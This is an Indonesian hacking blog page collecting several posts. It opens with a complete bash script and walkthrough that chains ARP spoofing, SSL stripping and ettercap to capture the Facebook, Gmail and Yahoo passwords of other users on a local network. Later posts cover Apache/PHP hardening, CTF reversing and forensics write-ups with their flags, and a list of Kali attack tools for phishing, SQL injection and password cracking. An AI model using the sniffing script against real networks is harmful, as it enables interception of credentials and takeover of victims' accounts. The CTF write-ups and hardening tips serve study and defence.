Social Icons

Cara mendapatkan bitcoin gratis

Friday 18 March 2016

Sniffing Hack FB

Hallo rekan2 IBT, mumpung belum ada kerjaan alias masih nganggur dan daripada otak nganggur juga mendingan ane buat tutor sniffing menggunakan script tetapi tutor ini hanya berlaku di BT4 R2 cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja bro............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable

Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
             .__  _____  _____           .__
 ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
    \/     \/                   \/     \/     \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah agan, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
   # ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :



5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap
Spoiler! :



mudah kan cara sniffingnya, tapi inget bro jg diacak acak  tuh account orang kan dosa.........

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......
untuk bikin menjadi executable save dulu file yang tadi dengan "sniff.sh"
lalu cari file sniff td di desktop.

nah untuk membuat executable silahkan lakukan ini
klik kanan sniff.sh >pilih permision > centang box executable > selesai deh

buka terminal ketik command dibawah ini :
# ./sniff.sh

selanjutnya isi deh pertanyaannya.
Selengkapnya...

Thursday 10 March 2016

[Keamanan Jaringan] Mengamankan Web Server Apache dan PHP

Saat ini, hampir setiap orang memiliki website sendiri-sendiri. Beberapa perusahaan pun sudah banyak yang memanfaatkan website untuk mempublikasikan perusahaan mereka. Seringkali website-website tadi diletakkan di server hosting yang dimiliki oleh penyedia jasa hosting. Akan tetapi ada juga website-website yang servernya dikelola sendiri. Mengelola server web anda sendiri sebetulnya tidak terlalu rumit. Hanya saja anda akan cukup pusing apabila ada pihak luar yang meretas website anda dan meletakkan file-file berbahaya yang mengganggu server ataupun website anda. Untuk itu, berikut ini ada sedikit tips yang bisa anda ikuti untuk mencegah atau setidaknya mempersulit hacker untuk masuk ke server anda.
Directive Allow dan Deny
Directive Allow dan Deny pada Apache berguna untuk membatasi IP mana saja yang berhak untuk mengakses website/direktori pada website anda. Misalkan saja anda ingin agar PhpMyAdmin di server anda hanya dapat diakses dari jaringan lokal perusahaan anda (misal : 192.168.1.0/24). Maka anda dapat mengubah konfigurasi PhpMyAdmin di Apache menjadi kurang lebih mirip seperti ini :
<Directory /usr/share/phpmyadmin>
Options FollowSymLinks
DirectoryIndex index.php

Order deny,allow
Deny from all
Allow from 192.168.1.0/255.255.255.0
</Directory>
Mengubah Nama-Nama Direktori yang Umum
Biasanya, hacker akan melakukan brute-force untuk mencari direktori-direktori atau file-file tertentu, seperti PhpMyAdmin/, admin/, dsb. Karena itu, akan lebih baik jika nama-nama direktori tersebut diubah,sehingga hanya orang-orang tertentu yang mengetahui, misal : PhpMyAdminQuwh/
Selain itu, pastikan anda sudah menghapus direktori/file yang digunakan untuk instalasi. Biasanya beberapa CMS semacam WordPress/Joomla/Moodle memiliki file PHP yang digunakan untuk melakukan instalasi CMS tersebut.

Lanjut ke bagian berikutnya, Pada bagian ini akan dibahas mengenai beberapa hal yang dapat kita lakukan untuk memperkuat web server kita dengan cara mengutak-atik konfigurasi PHP. Berikut ini adalah hal-hal yang dapat kita lakukan :
Disable Functions
Beberapa fungsi di PHP sangat berbahaya apabila digunakan tidak hati-hati. Salah satu contohnya adalah fungsi system() yang dapat digunakan untuk mengeksekusi shell command dari kode PHP anda. Kemudian ada juga fungsi ini_set() yang dapat mengubah konfigurasi php.ini melalui kode PHP yang ada. Fungsi-fungsi seperti ini akan lebih baik jika dinon-aktifkan saja apabila memang tidak ada aplikasi web anda yang menggunakannya. Untuk itulah ada option disable_functions di php.ini. Option ini akan men-disable semua fungsi yang disebutkan di dalamnya. Sehingga jika ada kode PHP yang menggunakan fungsi tersebut, kode tersebut tidak akan berjalan.
Contoh isi disable_functions yang disarankan (setiap nama fungsi dipisahkan dengan tanda koma), dapat ditambahi, dapat juga dikurang sesuai kebutuhan, dapat dilihat di sini
Sebetulnya ada 2 fungsi lagi yang bisa di-disable, yaitu base64_decode dan mysql_pconnect. Untuk mysql_pconnect ini masih tidak terlalu berbahaya jika digunakan. Hanya saja jika digunakan secara sembarangan dapat menghabiskan resource server yang cukup besar untuk menyimpan persistent connection.
Sedangkan base64_decode, biasanya digunakan untuk menyembunyikan kode-kode PHP yang berbahaya dalam bentuk base64, sehingga tidak dapat terdeteksi oleh antivirus atau secara manual. Biasanya fungsi ini akan dipanggil di dalam fungsi eval(). Meskipun begitu, beberapa CMS (moodle), PHP Framework (CodeIgniter), dan PHPMyAdmin menggunakan fungsi ini juga. Jadi jika di-disable, kemungkinan besar, fungsionalitas dari aplikasi-aplikasi tersebut akan terganggu. Karena itu, di bawah ini akan dijelaskan bagaimana agar script-script berbahaya yang bersembunyi dengan base64_decode dapat dicegah.
Disable Eval() Function
Eval adalah sebuah fungsi yang dapat digunakan untuk menjalankan script PHP yang ada di dalam parameter fungsi eval tersebut. Hal ini sangat berbahaya, karena bisa saja fungsi yang dijalankan di dalam eval() adalah fungsi-fungsi untuk meretas sistem kita. Karena itu, fungsi eval ini harus di-disable atau minimal dibatasi kemampuannya.
Option disable_functions tidak dapat mencegah fungsi eval() untuk berjalan, cara lain untuk men-disable eval() adalah dengan menggunakan patch suhosin untuk php. Kelebihan patch ini adalah tidak perlu mengompile ulang php untuk menjalankannya. Di beberapa distro seperti ubuntu, debian, dan fedora, patch ini sudah ada di repository. Jadi kita tinggal install saja di server dengan menggunakan apt-get atau synaptic atau yum. Paketnya biasanya bernama php5-suhosin. Setelah paket ini terinstall, buka file /etc/php5/apache2/conf.d/suhosin.ini (mungkin berbeda untuk distro selain Ubuntu dan Debian).
Kemudian pastikan baris ini aktif (tidak dianggap sebagai komentar) di file tersebut :
extension=suhosin.so
Setelah itu cari 3 baris ini :

  • suhosin.executor.eval.whitelist =
  • suhosin.executor.eval.blacklist =
  • suhosin.executor.disable_eval = off


Baris whitelist digunakan untuk menentukan fungsi-fungsi apa saja yang boleh dieksekusi oleh fungsi eval. Sedangkan blacklist menentukan fungsi-fungsi apa saja yang tidak boleh dijalankan oleh fungsi eval. Apabila kita ingin men-disable eval secara keseluruhan, maka kita harus merubah parameter suhosin.executor.disable_eval menjadi on. Akan tetapi beberapa CMS juga ada yang memanfaatkan fungsi eval ini. Karena itu, kita bisa memanfaatkan blacklist saja untuk mencegah beberapa fungsi berjalan di dalam eval. Isi dari blacklist dapat diisi sama dengan disable_functions tadi, atau cukup ditambahkan fungsi-fungsi tertentu yang tidak boleh berjalan di dalam eval, seperti base64_decode.
Di bagian sebelumnya base64_decode tidak dimasukkan ke disable_function, karena masih banyak yang menggunakannya. Tetapi aplikasi web biasa, jarang menggunakan base64_decode di dalam eval. Biasanya yang seperti itu hanya para pembuat theme CMS yang ingin menyembunyikan kode untuk menampilkan copyrightnya. Oleh karena itu, base64_decode ini didaftarkan saja di blacklist suhosin agar dia tidak berjalan apabila berada di dalam fungsi eval.
Sementara sekian dulu beberapa tips untuk memperkuat pertahanan server web kita, barangkali ada yang kurang atau salah, silahkan dimasukkan ke dalam kolom komentar yang tersedia di bawah.

Berikut ini adalah beberapa ebook yang enak dibaca dan mencakup dasar-dasar  keamanan jaringan dan hacking :
Hacking for Dummies 3rd Ed (2010)
Link : Download

Sesuai judulnya, buku ini memberikan dasar-dasar yang ada pada dunia hacking dan keamanan jaringan. Beberapa hal, bagi beberapa orang mungkin terlalu dasar. Tetapi bila anda merupakan orang awam di dunia ini, buku ini merupakan buku yang cocok. Sama seperti serial for dummies yang lain, analogi-analogi dan deskripsi yang ada memudahkan pembaca untuk memahami isinya.
Backtrack 4 – Assuring Security by Penetration Testing (2011)
Link : Download

Backtrack adalah salah satu dari distro Linux yang sering digunakan untuk melakukan penetration testing atau hacking. Buku ini membahas aplikasi-aplikasi yang terdapat pada Backtrack yang dapat digunakan untuk melakukan penetration testing. Dari sisi pembahasan cukup praktikal, tetapi sayangnya buku ini masih menggunakan Backtrack 4, dimana saat post ini dibuat sudah ada versi 5. Tetapi bagi anda yang terbiasa dengan Linux, itu seharusnya bukan masalah yang besar.
Certified Ethical Hacking (CEH) Study Guide (2010)
Link : Download

Certified Ethical Hacking (CEH) adalah sebuah sertifikasi bagi anda yang ingin menjadi seorang penetration tester profesional. Ethical hacker adalah seorang hacker yang memang ditugaskan untuk mencari celah-celah keamanan yang ada dan melaporkannya ke pihak yang menggunakan jasanya. Saat ini, profesi ini belum banyak yang mendalami secara serius. Nah, buku ini adalah buku yang cocok bagi anda yang tertarik untuk mengambil sertifikasi. Karena di dalamnya selain ada penjelasan mengenai teori-teori yang ada, disertai juga dengan contoh praktek dan latihan soal. Bagi anda yang tidak tertarik mengambil sertifikasi ini, buku ini juga tetap enak dibaca.
Selengkapnya...

[Reversing] CTF MEH reverse1

Soal ini di dapat dari CTF(Capture The Flag) yang diselenggarakan oleh MEH(Makasar Ethical Hacking),Sebenernya sih ctf nya udah lama, tapi daripada write up nya di diemin terus di pc, ya mending di post aja di blog, itung-itung buat arsip 😀
Nah di soal ini kita di kasih satu file ELF buat kita reverse, jadi si elf ini bakal nge print key nya jika password yang kita masukin sama dengan password yang telah kita tentukan, simple.
Buat yang butuh soalnya buat latihan bisa check di download di : DISINI
Pertama yang saya lakukan adalah check file itu sendiri (Pas pertama kan gak tau ini file apaan) :
CTF MEH write up
Yarp, kita dapet, ternyata file ELF 32 bit, Nah sesudah itu, tadinya saya mau coba static analysis dulu, tapi karena kayaknya programnya simple(sebenernya males sih) jadi langsung aja buka GDB terus debugging.
ini hasil dari disassemble fungsi main dari file nya :
CTF MEH writeup
3
Nah dari situ udah keliatan langsung, di address 0x0804851f ada pembandingan(cmp) dan di bawahnya ada instruksi jne(Jump if not equal).
4
di sini kita udah tau bahwa password yang kita masukan udah ada di register eax, kemudian di bandingkan dengan variable $0x111a7, kalo tidak sama(password salah) maka instruksi selanjutnya bakal loncat(jumping) ke address 0x804853d.
Disini ada dua cara supaya kita bisa dapat key nya tanpa tau password yang sebenarnya, yaitu :
  1. Kita bisa overwrite isi dari register eax dengan nilai dari variable tadi ketika proses pembandingan
  2. Kita bisa melakukan jumping langsung melewati instruksi jne dengan mengoverwrite nilai dari register eip dengan address sesudah instruksi  jne.
Disini, saya menggunakan cara yang kedua.
Hal yang pertama saya lakukan adalah memasang breakpoint di address 0x0804851f supaya program bisa berhenti pada address itu.
5
Kita bakal diminta password terlebih dahulu(ada pemanggilan fungsi scanf) itu bisa diisi dengan nilai apapun.
nah dari sini kita bisa melakukan jumping untuk melewati instruksi cmp dan jne dengan cara mengoverwrite nilai dari register eip.
6
Setelah itu kita bisa melanjutkan program dengan command c pada gdb.
7
Program akan memberikan kita Flagnya ^_^ tanpa harus mengetahui password nya.
Selengkapnya...

Soal NOOSC [Digital Forensic]


Ada beberapa situs yang memberikan sebuah permainan mengenai hacker , forensik dan lain-lain. Salah satunya http://www.noosc.co.id/ . Terdapat beberapa soal didalam situs tersebut , disini saya akan menjelaskan pemecahan kasus soal yang keempat.



  • Login ke situs tersebut dan pilih CHALLENGE > Soal keempat > Klik  PCAP [maka anda akan mendownload file pcap tersebut] :


  • Buka file pcap tersebut dengan menggunakan notepad++ , kita akan mencari alamat login pada file pcap tersebut.
    #Keterangan : garis lingkar merah adalah alamat login.

  • Selanjutnya,masukkan alamat login tersebut ke URL (Copy Paste), maka anda akan berada pada halaman login website tersebut,


  • Klik View Page Source , cari username & password pada page source tersebut,
    #Keterangan : garis lingkar merah adalah petunjuk username & password tersebut

  •  Buka kembali file pcap tersebut dengan menggunakan software Wireshark , cari protocol yang mengandung pengiriman suatu aplikasi > Klik kanan pada "info" aplikasi tersebut> Pilih follow TCP stream ,
  • Masih ingatkan petunjuk dari View Page Source  ?
    u = username   p = password >  



  • Kita telah mendapatkan username & password tersebut , selanjutnya masukkan username & password tersebut pada halaman website login yang tadi > Klik login , maka anda akan mendapatkan kode flagnya ,
  • Klik "sini" untuk menuju halaman web tempat pemasukkan kode flag tersebut > Klik "Submit" , maka anda telah menyelesaikan level keempat.


#Sekian penjelasan dari saya , semoga bermanfaat .
Selengkapnya...

Soal Cyber Defence Competition

Silakan download soal CDC nomor 3 DISINI .

Langkah-langkahnya :
  •  Extrack file tersebut , open with rar pada file yang telah kita extrack , temukan 3 buah gambar dan extrack kembali gambar tersebut.

gambar1
gambar2
gambar3


















  • Open with rar gambar 1 & 2 , simpan script pertama dan kedua.

 Sekarang buka linux untuk menyelesaikan script-script tersebut , saya menggunakan linux dengan distro kali-linux.

  • Ubah extension script tersebut nama.pl , karena script tersebut adalah bahasa pemrograman.
  • Buka scirpt pertama & script kedua , copy + paste script kedua diatas script pertama , simpan script tersebut.
  • Open new terminal , 'outguess -k "CLUE SOAL 3" -r gambar3.jpg output_file.txt'





  • Open output_file.txt maka, akan keluar Key dari gambar3 .
  • Ketik 'perl nama_script.pl -d'
  • Masukkan Clue,Key dan Enter , maka flagsnya akan keluar.

Semoga bermanfaat buat anda .

Selengkapnya...

Wednesday 9 March 2016

Soal FORENSIC level 2 CDC2015 beserta FILE nya

Introduction

Sebelumnya saya pernah memposting Cyber Defence Competition 2015 Offline / Final
Dan sekarang saya akan sharing write up dari soal level 2 kategori Digital Forensic pada Cyber Defence Competition 2015 Offline / Final yang diselenggarakan di Akademi Angkatan Udara Yogyakarta.

Required

Download keperluan filenya :
  1. Soal Digital Forensic Level 2 CDC 2015.
    Link Download : Soal Forensic Level 2 CDC2015
  2. Tools HjSplit
    Link Download : HjSplit
  3. Tools WavePad
    Link Download : WavePad
  4. Tools Steghide
    Link Decored : Steghide
  5. Vigenere Chiper Decoder
    Link Decored : Vigenere Chiper Decode

Narrative

Ok, sekarang kita mulai tracing mencari jejak jejak misterius FLAG.
  1. Pertama download dan extrack file soalnya, disitu ada 2 buah file yaitu DJ_ALTAIR.jpg dan tolong.rar.
  2. kemudian extract file tolong.rar nya.

  3. isi file tolong.rar adalah sebuah pecahan file, sortir berdasarkan created date menggunakan command ls .

  4. rename file pecahaannya berdasarkan urutan created datenya (Disini filenya saya inisial x ).
  5. Kemudian join semua filenya menggunakan HjSplit.
  6. kemudian muncul file hasil joinannya
  7. Cek file apakah itu ? dan ternyata Wave audio .

  8. lalu buka file Wave tersebut menggunakan WavePad dan tampilkan spectrum frekuensinya View > Wave > frequncy view dan terlihatlah sesuatu disitu.
  9. jika gambar tersebut di rotate / diputar kebalik secara vertikal akan membentuk sebuah kalimat,
    yaitu d1g174l_f0r3n51cmenyenangkan ,ok kita menemukan sebuah text mencurigakan ini.
  10. nah pada file DJ_ALTAIR.jpg sepertinya juga ada sesuatu nih didalamnya, coba kita cek menggunakan steghide, dan ternyata meminta password, lalu masukan text yang kita temukan tadi.

    dah ternyata berisi sebuah file HEHEHE.docx .
  11. ok kita extract saja filenya dan masukan passwordnya.
  12. lalu buka file menggunakan libre/open/microsoft office, dan ternyata berisi sebuah text misterius yang mirip dengan vigenere chiper.
  13. ok langsung saja kita coba decode menggunakan  Vigenere Chiper Decode , isikan kalimat TUNULSJAHZHYGRSOKSGHRCNEA pada bagian decode dan AGAKBERMUTU pada keynya, lalu decode.
  14. dan kita dapatkan FLAGnya 😀 ..

Result

Flagnya adalah tonkkosongnyaringbunyinya .

Appendix

Demikianlah hasil dari penyelesaian pada soal Digital Forensic level 2 Cyber Defence Competition 2015 Offline / Final yang diselenggarakan di Akademi Angkatan Udara Yogyakarta.
Selengkapnya...

Soal FORENSIC level 1 CDC2015 beserta FILE nya


Required

Download keperluan filenya :
  1. Soal Digital Forensic Level 1 CDC 2015.
    Link Download : Soal Forensic Level 1 CDC2015
  2. Tools WireShark
    Link Download : WireShark
  3. Hexa Decoder
    Link Decored : Hexa Decoder

Narrative

Ok, sekarang kita mulai tracing mencari jejak jejak misterius FLAG.
  1. Pertama kalian buka file soal post.pcapng dengan tools WireShark.
  2. Nah menurut saya pada nama filenya sepertinya kita mendapatkan clue kalau Flagnya ada pada Http Request Method POST, jadi kita cari pada history method Http Request Method POST.
    Gunakan Filter berikut untuk mencarinya :

  3. Disini terdapat 6 history yang menggunakan Http Request Method POST, lalu cek satu persatu value dari setiap POSTnya .
  4. dari 6 history tersebut ternyata ada 4 history yang mensubmit kalimat flag.
    Yaitu pada No :
    1. No : 3280
      Val : 466c6167206e79
    2. No : 3627
      Val : 61206164616c61
    3. No : 11714
      Val : 68203a2053316d
    4. No : 12593
      Val : 706c3368337840
  5. Lalu kami decode Valuenya menggunakan Hexa Decoder
  6. Dan Flagnya muncul deh.

Result

Flagnya adalah S1mpl3h3x@ .

Appendix

Demikianlah hasil dari penyelesaian pada soal Digital Forensic level 1 Cyber Defence Competition 2015 Offline / Final yang diselenggarakan di Akademi Angkatan Udara Yogyakarta.
Selengkapnya...

Saturday 5 March 2016

Hacking tool kalilinux

1. PWN STAR

A bash script to launch the AP, can be configured with a variety of attack options. Including a php script and server index.html, for phishing. Can act as a multi-client captive portal using php and iptables. Exploitation classics such as crime-PDF, De-auth with aireplay, etc..



General Features:


  • Managing Interfaces and MAC Spoofing
  • Set sniffing
  • Phishing Web
  • Karmetasploit
  • WPA handshake
  • De-auth client
  • Managing Iptables



2. ZED ATTACK PROXY (ZAP)

(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.


Key Features:


  • Intercepting Proxy
  • Active scanners
  • Passive scanners
  • Brute Force scanner
  • Spider
  • Fuzzer
  • Port Scanner
  • Dynamic SSL certificates
  • API
  • Beanshell integration

                                                    ZAP Download Here:


3. SET (SOCIAL ENGINEERING TOOLKIT)

Tools that focus on attacking the human element of weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.



Key Features:

  • Spear-Phishing Attack Vector
  • Java Applet Attack Vector
  • Metasploit Browser Exploit Method
  • Credential Harvester Attack Method
  • Tabnabbing Attack Method
  • Man Left in the Middle Attack Method
  • Web Jacking Attack Method
  • Multi-Attack Web Vector
  • Infectious Media Generator
  • Teensy USB HID Attack Vector



4. BURP SUITE


Burp Suite is a very nice tool for web application security testing. This tool is great for pentester and security researchers. It contains a variety of tools with many interfaces between them designed to facilitate and accelerate the process of web application attacks.



General Function:

  • Interception proxies
  • Radar and spiders crawling
  • Webapps scanner
  • Tool assault
  • Repeater and sequencer tools

5. ETTERCAP


Ettercap is a multipurpose sniffer / interceptor / logger for Local Area Network . It supports active and passive dissection of many protocols (even in code) and includes many feature for network and host analysis.




General Function:

  • To capture traffic and data
  • To do logging network
  • Etc.


6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)


The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware Appliance that can be configured with all the requirements to perform a detailed digital forensic. Compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on the Ubuntu base with many additional tools and capabilities that are used in modern forensic technology.


General Function SIFT:

  • iPhone, Blackberry, and Android Forensic Capabilities
  • Registry Viewer (YARU)
  • Compatibility with F-Response Tactical, Standard, and Enterprise
  • PTK 2.0 (Special Release - Not Available for Download)
  • Automated Generation Timeline via log2timeline
  • Many Firefox Investigative Tools
  • Windows Journal Parser and Shellbags Parser (jp and sbag)
  • Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)
  • Complete Overhaul of Regripper Plugins (added over 80 additional plugins)


7. WIRESHARK

Wireshark is the most widely used and most popular in the world the protocol analyzer, and is the de facto standard across many industries and educational institutions to analyze the network in different protocol.



General Function:

  • Live capture and offline analysis
  • Standard three-pane packet browser
  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  • Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility
  • The most powerful display filters in the industry
  • Rich VoIP analysis
  • Read / write many different capture file formats
  • Etc.

8. WEBSPLOIT

WebSploit is an Open Source Project for Remote Scan and Analysis System of the weaknesses in web applications.



Key Features: 

[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan, Target Used Crawler From Metasploit WMAP plugin
[+] format infector - inject the payload into reverse and bind file format
[+] phpmyadmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] admin finder
[ +] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] Dos ARP Attack
[+ ]'s Killer Attack
[+] Attack Fake Update
[+] Fake Access Point Attack


9. WINAUTOPWN


WinAutoPWN is a tool that is used to exploit the Windows Framework directly, so that we are automatically going to be an administrator on the windows. Widely used by "Defacer" Indonesia to deface the Windows Server




10. HASHCAT

Hashcat are a variety of tools to crack passwords in encrypted, it is very powerful for password recovery.


General Function:

  • Multi-Threaded
  • Free
  • Multi-Hash (up to 24 million hashes)
  • Multi-OS (Linux, Windows and OSX native binaries)
  • Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
  • SSE2 accelerated
  • All Attack-Modes except Brute-Force and Permutation can be extended by rules
  • Very fast Rule-engine
  • Rules compatible with JTR and PasswordsPro
  • Possible to resume or limit session
  • Automatically recognizes recovered hashes from outfile at startup
  • Can automatically generate random rules
  • Load saltlist from an external file and then use them in a Brute-Force Attack variant
  • Able to work in an distributed environment
  • Specify multiple wordlists or multiple directories of wordlists
  • Number of threads can be configured
  • Lowest priority threads run on
  • 30 + Algorithms is implemented with performance in mind
  • ... and much more




11. UNISCAN

Uniscan is a scanner for web applications, written in perl for Linux. Currently Uniscan version is 6.2.



General Function:

  • Identification of system pages through a Web Crawler.
  • Use of threads in the crawler.
  • Control the maximum number of requests the crawler.
  • Control of variation of system pages identified by Web Crawler.
  • Control of file extensions that are ignored.
  • Test of pages found via the GET method.
  • Test the forms found via the POST method.
  • Support for SSL requests ( HTTPS ).
  • Proxy support.
  • Generate site list using Google.
  • Generate site list using Bing.
  • Plug-in support for Crawler.
  • Plug-in support for dynamic tests.
  • Plug-in support for static tests.
  • Plug-in support for stress tests.
  • Multi-language support.
  • Web client.



12. OLYYDBG

OllyDbg is a 32-bit assembler debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source code is not available.



General Function:

  • Intuitive user interface, no cryptical commands
  • Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
  • Directly loads and debugs DLLs
  • Object file scanning - locates routines from object files and libraries
  • Allows for user-defined labels, comments and function descriptions
  • Understands debugging information in Borland ® format
  • Saves patches between sessions, writes them back to executable file and updates fixups
  • Open architecture - many third-party plugins are available
  • No installation - no trash in registry or system directories
  • Debugs multithreaded applications
  • Attaches to running programs
  • Configurable disassembler, supports both MASM and IDEAL formats
  • MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions
  • Full UNICODE support
  • Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
  • Recognizes complex code constructs, like call to jump to procedure
  • Decodes calls to more than 1900 standard API and 400 C functions
  • Gives context-sensitive help on API functions from external help file
  • Sets conditional, logging, memory and hardware breakpoints
  • Traces program execution, logs arguments of known functions
  • Shows fixups
  • Dynamically traces stack frames
  • Searches for imprecise commands and masked binary sequences
  • Searches whole allocated memory
  • Finds references to constant or address range
  • Examines and modifies memory , sets breakpoints and Pauses program on-the-fly
  • Assembles commands into the shortest binary form
  • Starts from the floppy disk
13. BBQSQL

BBQSQL an Opensource SQL injection tools with the framework specifically designed to carry out the process in hyper fast, database agnostic, easy to setup, and easy to modify. This is another amazing release from Arsenal Blackhat USA 2012. When conducting security assessments of applications, we often find that it is difficult to SQL vulnerabilities exploitable, with this tool will be extremely easy.

BBQSQL written in the Python programming language. This is very useful when complex SQL injection attack vulnerabilities. BBQSQL also a semi-automated tool, which allows little customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI for setting up the attack much easier.



General Function:

  • SQL Injection Tools
  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

14. CRYPTOHAZE

Tools to crack password / hash where cryptohaze supports CUDA, OpenCL , and the CPU code (SSE, AVX, etc.). Can run on OS that support CUDA. These are intended to make it easier to pentester did crack the hash.



General Function:

  • Crack various kinds of hash
  • Showing results from crackhash
  • Cracking on various OS platforms

                                          


15. SAMURAI WEB TESTING FRAMEWORK (SWTF)
SWTF is used to do testing / pentest against web application, is used to find a weakness and exploited to perform web. Very comprehensive and widely used in the world, including one used by staff binushacker



General Function:


  • Web Scanner
  • Web Mapping
  • Web Exploitation

Selengkapnya...

jago Photoshop